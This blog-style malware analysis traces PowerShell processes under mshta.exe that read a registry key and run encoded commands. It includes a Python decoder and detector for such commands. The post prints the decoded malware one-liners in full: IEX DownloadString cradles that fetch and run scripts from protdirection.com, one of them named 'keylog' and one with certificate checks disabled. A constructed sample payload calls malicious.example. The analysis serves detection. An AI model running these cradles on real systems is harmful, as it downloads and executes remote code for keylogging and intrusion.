Suspicious Activity via PowerShell

I have been using Process Explorer quite a lot; it is a kind of replacement for Task Manager for me. Some day I may write about it or share a training module on it; however, this post is about how Process Explorer helped me find suspicious activity via PowerShell.

One of the machines had been showing high CPU utilization for a few days; however, at the time I logged in it was not showing high CPU utilization by PowerShell, although PowerShell instances were still running.

When I logged in, there were 3 instances of PowerShell running under mshta.exe in the tree view. mshta.exe is the Microsoft HTML Application Host; it is a valid Microsoft executable, but it is at times used by malware to execute programs/applications.

I opened the properties of PowerShell and checked the command line, which looked like this:

Process Explorer – PowerShell Activity

The command shows that PowerShell is reading the registry location HKLM\Software\Microsoft\Windows\CurrentVersion for the key SecCert. The value under SecCert:

Registry Entry in the SecCert registry key.

Now when we checked the properties of the 2nd PowerShell process, which is a child of the 1st PowerShell, it was evident that PowerShell was executed with the key from the registry.

2nd instance of PowerShell activity

So far it was evident that a script is running PowerShell to execute a PowerShell command whose parameter is stored in the registry. Next I checked the command line of the last PowerShell executable, which looked like:

Last PowerShell instance activity

Now we have 2 PowerShell commands with Base64-encoded information, which is an HTTP transmission. Using an online Base64 decoder we got the 2 outputs below:

Output of 2nd PowerShell command

When we remove the white boxes we get the text:

"while(1){try{IEX(New-Object Net.WebClient).DownloadString('http://protdirection.com/'+([char](85-(-37))))}catch{Start-Sleep -s 10}}"

Now we try the 3rd PowerShell HTTP transmission:

3rd PowerShell http transmission

After removing the white boxes from the output we get the command:

"[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }; IEX(New-Object Net.WebClient).DownloadString('https://protdirection.com/script?id=random&name=keylog')"
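The decoding and triage described above can be done without an online decoder. The following is an added example written for this post, not code from the original author: it assumes the "white boxes" in the online decoder output are the 0x00 bytes of the UTF-16LE text that powershell.exe -EncodedCommand expects (which a plain ASCII decoder renders as blank glyphs), decodes the payload properly, flags the indicators seen above (IEX, DownloadString, disabled certificate validation, an endless retry loop, a hidden window), and checks whether a PowerShell process sits under mshta.exe in the process tree. The process records, the .hta path, the registry key "HKLM:\Software\Example" and the host "malicious.example" are constructed sample data, not values from the post.

```python
import base64
import re
from typing import List, Optional, Tuple

def encode_command(script: str) -> str:
    """Encode text the way powershell.exe -EncodedCommand expects: UTF-16LE, then Base64."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")

def raw_base64_bytes(blob: str) -> bytes:
    """Plain Base64 decode only: every second byte is 0x00 (the 'white boxes')."""
    return base64.b64decode(blob)

def decode_encoded_command(blob: str) -> str:
    """Decode as UTF-16LE so the 0x00 bytes become part of the characters, not noise."""
    return raw_base64_bytes(blob).decode("utf-16le")

# -EncodedCommand and its accepted abbreviations, followed by the Base64 blob.
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

def extract_encoded_payload(cmdline: str) -> Optional[str]:
    m = ENC_FLAG.search(cmdline)
    return m.group(1) if m else None

# Indicators matching the behaviour observed in the post.
INDICATORS = [
    (re.compile(r"\bIEX\b|Invoke-Expression", re.I), "inline evaluation (IEX/Invoke-Expression)"),
    (re.compile(r"DownloadString|Net\.WebClient", re.I), "download of script from a remote host"),
    (re.compile(r"ServerCertificateValidationCallback", re.I), "TLS certificate validation disabled"),
    (re.compile(r"while\s*\(\s*(?:1|\$true)\s*\)", re.I), "infinite retry loop"),
    (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), "hidden window"),
]

def suspicious_indicators(text: str) -> List[str]:
    return [label for rx, label in INDICATORS if rx.search(text)]

def ancestors(pid: int, procs: list) -> List[str]:
    """Image names from the process itself up to the root, as Process Explorer's tree shows them."""
    by_pid = {p["pid"]: p for p in procs}
    chain, seen, cur = [], set(), by_pid.get(pid)
    while cur and cur["pid"] not in seen:
        seen.add(cur["pid"])
        chain.append(cur["image"].lower())
        cur = by_pid.get(cur["ppid"])
    return chain

def analyze(procs: list) -> List[Tuple[int, List[str]]]:
    """Return (pid, reasons) for every powershell.exe that looks suspicious."""
    findings = []
    for p in procs:
        if p["image"].lower() != "powershell.exe":
            continue
        reasons = []
        if "mshta.exe" in ancestors(p["pid"], procs)[1:]:
            reasons.append("spawned under mshta.exe")
        text = p["cmdline"]
        blob = extract_encoded_payload(text)
        if blob:
            reasons.append("encoded command")
            text += " " + decode_encoded_command(blob)  # inspect the decoded script too
        reasons += suspicious_indicators(text)
        if reasons:
            findings.append((p["pid"], reasons))
    return findings

# Constructed sample process list (not from the post) mirroring the observed tree:
# explorer.exe -> mshta.exe -> powershell.exe (reads registry) -> powershell.exe (encoded).
STAGE2 = ("while(1){try{IEX(New-Object Net.WebClient).DownloadString("
          "'http://malicious.example/z')}catch{Start-Sleep -s 10}}")
SAMPLE_PROCESSES = [
    {"pid": 100, "ppid": 1,   "image": "explorer.exe",   "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": "mshta.exe",      "cmdline": "mshta.exe C:\\Users\\Public\\update.hta"},
    {"pid": 300, "ppid": 200, "image": "powershell.exe",
     "cmdline": "powershell.exe -w hidden -c \"IEX (Get-ItemProperty 'HKLM:\\Software\\Example').Payload\""},
    {"pid": 400, "ppid": 300, "image": "powershell.exe",
     "cmdline": "powershell.exe -EncodedCommand " + encode_command(STAGE2)},
    {"pid": 500, "ppid": 100, "image": "powershell.exe",
     "cmdline": "powershell.exe -NoProfile -File C:\\Scripts\\backup.ps1"},
]

if __name__ == "__main__":
    for pid, reasons in analyze(SAMPLE_PROCESSES):
        print(pid, "->", "; ".join(reasons))
```

In practice the process list would come from Process Explorer, `Get-CimInstance Win32_Process` or Sysmon event ID 1, which record the parent PID and command line that the two checks above rely on; the benign backup script (pid 500) is not reported, while both PowerShell instances under mshta.exe are.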


Conclusion:


The troubleshooting steps above lead to the conclusion that the machine is somehow infected by malware which tries to download a script from https://protdirection.com/script?id=random&name=keylog and then executes it to capture keystrokes and send them to a network location.


Since we are not sure about the complete functionality of the script downloaded from the site, we can't execute it from our end. If someone wants to understand exactly what is happening, they will need to capture Procmon and Wireshark logs during script execution.


Reference:

  1. To understand what Base64 is, see https://en.wikipedia.org/wiki/Base64 .